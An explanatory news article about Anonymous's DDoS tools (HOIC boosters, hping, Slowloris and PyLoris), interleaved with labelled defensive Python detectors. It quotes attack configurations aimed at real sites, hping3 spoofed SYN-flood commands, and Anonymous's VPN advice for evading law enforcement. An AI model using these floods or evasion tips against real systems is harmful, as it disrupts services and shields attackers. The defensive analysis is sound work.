High Orbits and Slowlorises: understanding the Anonymous attack tools
Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm’s way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.
In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”
The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.
HOIC isn’t exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a “lulz” friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.
This rocket needs boosters
The code itself isn’t that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software’s Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using “boosters,” modules with additional bits of Basic code that are interpreted at runtime.
HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. “HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that’s putting it mildly—the attack code is generated based completely on what’s in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.
One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:
// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:
useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL
The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:
UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")
Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")
Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )
URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"
PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"

While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.
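The booster traits described above (a rotating set of User-Agents, a fixed Google referer, and per-request variation in the URL meant to defeat a CDN or cache) are the same traits a site operator can look for in the access log, because a single real browser sends one User-Agent and hits a small number of distinct pages. The following is an added example, not code from the article or from HOIC: a small Python detector that parses combined-format access log lines and flags source addresses whose traffic matches that pattern. The log lines are constructed for the demonstration, and the thresholds are assumptions a site would tune against its own baseline.

```python
"""Flag HOIC-style HTTP floods in a web access log (added example; the log
lines are constructed and the thresholds are assumptions)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

UAS = [  # User-Agent strings of the kind a booster rotates through
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12",
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def flag_flood_sources(lines, window_s=60, min_requests=50,
                       min_ua_variety=3, min_path_ratio=0.5):
    """Return {ip: [reasons]} for sources that exceed the request-rate threshold
    in some window_s-second span AND show at least one booster fingerprint:
    several distinct User-Agents from one address, or a high share of unique
    URLs (cache-busting). Rate alone is not enough, so a busy NAT gateway that
    serves many real users is not flagged by address diversity by itself."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, j = 0, 0  # sliding window: size of the busiest window_s span
        for i in range(len(recs)):
            while (recs[i]["ts"] - recs[j]["ts"]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        reasons = []
        if best >= min_requests:
            reasons.append(f"{best} requests within {window_s}s")
            uas = {r["ua"] for r in recs}
            if len(uas) >= min_ua_variety:
                reasons.append(f"{len(uas)} distinct User-Agents from one address")
            paths = {r["path"] for r in recs}
            if len(paths) / len(recs) >= min_path_ratio:
                reasons.append("mostly unique URLs (cache-busting)")
        if len(reasons) >= 2:
            flagged[ip] = reasons
    return flagged


def build_sample_log():
    """Constructed sample: one address firing 60 requests in 30 seconds with a
    rotating User-Agent and a changing query string, plus one normal visitor."""
    lines = []
    base = "15/Feb/2012:10:00:%02d +0000"
    for n in range(60):
        ts = base % (n // 2)
        lines.append(f'203.0.113.7 - - [{ts}] "GET /index.html?x={n} HTTP/1.1" 200 5120 '
                     f'"http://www.google.com/?q=example" "{UAS[n % 3]}"')
    for n, page in enumerate(["/", "/about", "/contact", "/"]):
        ts = base % (n * 7)
        lines.append(f'198.51.100.9 - - [{ts}] "GET {page} HTTP/1.1" 200 2048 "-" "{UAS[2]}"')
    return lines


if __name__ == "__main__":
    for ip, why in flag_flood_sources(build_sample_log()).items():
        print(ip, "->", "; ".join(why))
```

Because the randomised URLs exist to bypass caching, they are also what makes the flood expensive for the origin; rate-limiting at the edge on the flagged address (or on the `JSESSIONID`-style fixed cookie and identical POST body that a booster like the Visa one reuses on every request) is the usual first response.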
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:
'Creating the socket request
Dim httpObj as HTTPSocket
Dim i as integer
Dim reqSize as integer = 0
httpObj = New HTTPSocket

' Adding the headers generated by the booster
for i = 0 to Headers.Ubound
  reqSize = reqSize + Headers(i).Len
  httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
Next

'For attacks where POST has been chosen as the type of HTTP request
if(UsePost) then
  reqSize = reqSize + PostBuffer.Len + 4 ' POST
  httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
  httpobj.Post URL
'For GET based attacks
else
  reqSize = reqSize + 3 ' GET
  httpobj.Get URL
end if

'Tracking how much data has been sent to the target
TotalBytesSent = TotalBytesSent + reqSize

But HOIC isn’t the only tool that Anons are promoting.

The old(er) bag of tricks
Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfilippo, a Sicilian programmer. It uses a command-line interface similar to that of the ping network utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes of TCP requests at a target, while masking the source of the attack through spoofing, as Anonymous’ tutorial shows:
### Normal hping DoS attack:
hping3 -S -i u100 riaa.org
### Spoofed random source address attack:
hping3 -S -i u100 riaa.org --rand-source
### Reflected attack (it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i u100 riaa.org -a mpaa.org
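Seen from the target's edge, the three invocations above leave three different signatures: a plain SYN flood from one real address, a flood in which nearly every SYN carries a different source address, and a flood in which every SYN claims to come from a single third party that never completes a handshake. The following is an added example, not code from the article or from hping: a Python function that takes a list of observed TCP packets, finds the busiest one-second burst of SYNs aimed at a host, and reports which of those patterns it matches. The packets are constructed tuples rather than a live capture, and the thresholds are assumptions.

```python
"""Classify a burst of inbound SYNs (added example; packets and thresholds
are constructed assumptions, not captured traffic)."""

SYN, SYN_ACK, ACK = "S", "SA", "A"   # TCP flag shorthands used in the tuples

TARGET = "192.0.2.10"   # constructed address of the host being watched


def summarise_syns(packets, target, window_s=1.0, syn_threshold=200):
    """packets: iterable of (time_s, src_ip, dst_ip, flags) as seen at the
    target's edge. Returns a verdict for the busiest window_s-second burst of
    SYNs aimed at target: whether it is a flood, how many distinct sources it
    used, and what fraction of them later finished the three-way handshake.
    Spoofed sources never send the final ACK, so completion stays at zero."""
    packets = list(packets)
    syns = sorted((t, src) for t, src, dst, fl in packets if dst == target and fl == SYN)
    completed = {src for t, src, dst, fl in packets if dst == target and fl == ACK}
    if not syns:
        return {"flood": False}
    best_start, best_count, j = 0, 0, 0
    for i in range(len(syns)):            # sliding window over sorted SYN times
        while syns[i][0] - syns[j][0] > window_s:
            j += 1
        if i - j + 1 > best_count:
            best_count, best_start = i - j + 1, j
    window_sources = {src for _, src in syns[best_start:best_start + best_count]}
    distinct = len(window_sources)
    completion = sum(1 for s in window_sources if s in completed) / distinct
    verdict = {
        "flood": best_count >= syn_threshold,
        "syns_per_window": best_count,
        "distinct_sources": distinct,
        "handshake_completion": round(completion, 2),
    }
    if verdict["flood"]:
        if distinct >= 0.9 * best_count:
            verdict["pattern"] = "random spoofed sources"      # the --rand-source shape
        elif distinct <= 3 and completion == 0:
            verdict["pattern"] = "single spoofed source"       # the -a <address> shape
        else:
            verdict["pattern"] = "unspoofed or mixed sources"
    return verdict


def build_random_source_flood():
    """Constructed: 500 SYNs in half a second, every one from a different address."""
    return [(i / 1000.0, f"10.{(i >> 8) & 255}.{i & 255}.1", TARGET, SYN) for i in range(500)]


def build_reflected_flood():
    """Constructed: 500 SYNs that all claim one source which never completes a handshake."""
    return [(i / 1000.0, "198.51.100.20", TARGET, SYN) for i in range(500)]


def build_normal_traffic():
    """Constructed: 20 clients over ten seconds, each completing SYN / SYN-ACK / ACK."""
    pk = []
    for i in range(20):
        src = f"203.0.113.{i}"
        pk += [(i * 0.5, src, TARGET, SYN),
               (i * 0.5 + 0.01, TARGET, src, SYN_ACK),
               (i * 0.5 + 0.02, src, TARGET, ACK)]
    return pk


if __name__ == "__main__":
    for name, pkts in [("random-source", build_random_source_flood()),
                       ("reflected", build_reflected_flood()),
                       ("normal", build_normal_traffic())]:
        print(name, summarise_syns(pkts, TARGET))
```

The "single spoofed source" verdict is the one to handle with care: a block on that address punishes the party whose address was forged (mpaa.org in the tutorial's example) and does nothing to the attacker. Spoofed SYN floods are met on the host with SYN cookies (`net.ipv4.tcp_syncookies` on Linux) and upstream with ingress filtering of the kind described in BCP 38, which drops packets whose source address could not legitimately have come from that network.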
Slowloris is a different sort of attack entirely—a slow HTTP attack that sends partial HTTP requests to a server, making it wait for the rest of each request while the remaining fragments are spooned out slowly enough to keep the server’s socket open. This type of attack works best against low-traffic sites on Apache and a variety of other Web servers by eating up available network ports on the server. It is ideal for attacks on servers where there is doubt that enough bandwidth is available for a brute-force DDoS to succeed, or where there is concern about collateral damage to other users on the same network. That is why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor "identities," changing the apparent location the attack is coming from at user-defined intervals.
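What defeats Slowloris and PyLoris on the server side is not bandwidth but a rule about how long a connection may spend in the header-reading phase. The following is an added example, not code from the article, from Slowloris or from any web server: a Python model of the policy Apache's mod_reqtimeout applies with a setting such as `RequestReadTimeout header=20-40,MinRate=500`, in which the client gets an initial budget to finish its headers, every byte received buys a little more time up to a hard ceiling, and the connection is closed when the budget runs out. The arrival times and chunks below are constructed; the numbers are the assumed defaults of the model, not measurements.

```python
"""Header-phase deadline model (added example; chunks and timings are
constructed, and the policy numbers are assumptions)."""


def judge_header_phase(chunks, initial_s=20, max_s=40, min_rate_bps=500):
    """chunks: list of (arrival_time_s, bytes) received on one connection, in order.
    Returns ("complete", t) when the blank line that ends the headers arrives
    before the deadline, or ("drop", t) with the time the server gives up.
    The deadline starts at initial_s, grows by one second per min_rate_bps
    bytes received, and never exceeds max_s."""
    deadline = float(initial_s)
    buf = b""
    for t, data in chunks:
        if t > deadline:
            return ("drop", deadline)          # client was too slow; close the socket
        buf += data
        deadline = min(float(max_s), deadline + len(data) / min_rate_bps)
        if b"\r\n\r\n" in buf:
            return ("complete", t)             # headers finished; hand off to the handler
    # client went silent without finishing: the connection dies when the budget expires
    return ("drop", deadline)


def browser_request():
    """Constructed: a normal browser sends the whole header block at once."""
    return [(0.02, b"GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n")]


def slowloris_like_trickle():
    """Constructed: one partial header line every ten seconds and never the blank
    line, the pattern the article describes."""
    req = [(0.0, b"GET / HTTP/1.1\r\nHost: example.test\r\n")]
    req += [(10.0 * n, b"X-a: %d\r\n" % n) for n in range(1, 10)]
    return req


def slow_but_honest_client():
    """Constructed: a client on a poor link that still finishes within the budget."""
    return [(0.0, b"GET / HTTP/1.1\r\n"), (6.0, b"Host: example.test\r\n"), (15.0, b"\r\n")]


if __name__ == "__main__":
    for name, conn in [("browser", browser_request()),
                       ("trickle", slowloris_like_trickle()),
                       ("slow-honest", slow_but_honest_client())]:
        print(name, judge_header_phase(conn))
```

The per-byte extension is what lets a genuinely slow client through while still cutting off a connection that sends a few bytes every several seconds: the trickle above earns only fractions of a second per header line and is dropped shortly after the initial budget expires. Because each attacking connection costs the attacker almost nothing, the complementary control is a per-address cap on concurrent connections, so that one client cannot hold the server's whole connection pool.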
A screenshot of PyLoris in action

Used individually, these tools can be somewhat effective in slowing down many of the sites that Anonymous targets. But as Curt Wilson, a researcher with Arbor Networks’ Security Engineering and Response Team, said to Ars in an interview, "If you use volumetric floods on top of specific application attacks [like Slowloris], it’s a pretty powerful combination."
And just by the sheer number of attacking systems that Anonymous can bring aboard to launch these attacks when its members and friends are highly motivated—as in the wake of the Megaupload shutdown—even the most basic of tools can cause problems for large websites.
Covering the trail
There is still the matter of being able to pull off these large attacks with volunteered computers and keeping those volunteers anonymous. While Hping can provide some obscuring of the source of an attack, the other tools point straight back at their source. So Anons have been eager to find ways to keep their IP addresses concealed.
The problem is that freely available anonymizing networks generally aren’t up to the task of handling the bandwidth of DoS attacks. Attempting to launch HOIC or other DDoS tools over Tor would amount to an attack on that network itself—and on the Anonymous members who use it to protect themselves. So with the exception of Slowloris and PyLoris attacks, which demand relatively little bandwidth, the Anonymous edict is “DO NOT DOS THROUGH TOR.”
Some Anons have turned to a variety of proxy tools—including a fairly suspicious commercial software package called AutoHideIP, which claims to anonymize users by connecting them through proxies for a one-time fee, even selecting the country from which their IP address appears to be located. Efforts by Ars to contact the creators of AutoHideIP, Coolware Max, were unsuccessful.
But there’s reason to be suspicious of the security of proxy services, and of other anonymizing services such as VPNs, because they could be compelled by law enforcement to turn over traffic logs. That was the case in the arrest of one alleged LulzSec member, who was apprehended after VPN provider HideMyAss.com turned over log data that helped trace him to Arizona.
For that reason, Anonymous’ best-practice advice for members is to stick to Anonine and VPNTunnel, two paid VPN-based anonymizing services based in Sweden — where privacy laws don’t require providers to keep access logs (and in some cases prohibit it).
Both of the services are based on OpenVPN, a GPL-based open source virtual private network technology available on Windows, MacOS and Linux. However, as Anonine has expanded service beyond Sweden, with servers available worldwide, some of its servers have started to keep logs in accordance with local laws—so Anonymous’ members are warned to specifically configure their clients for Swedish servers.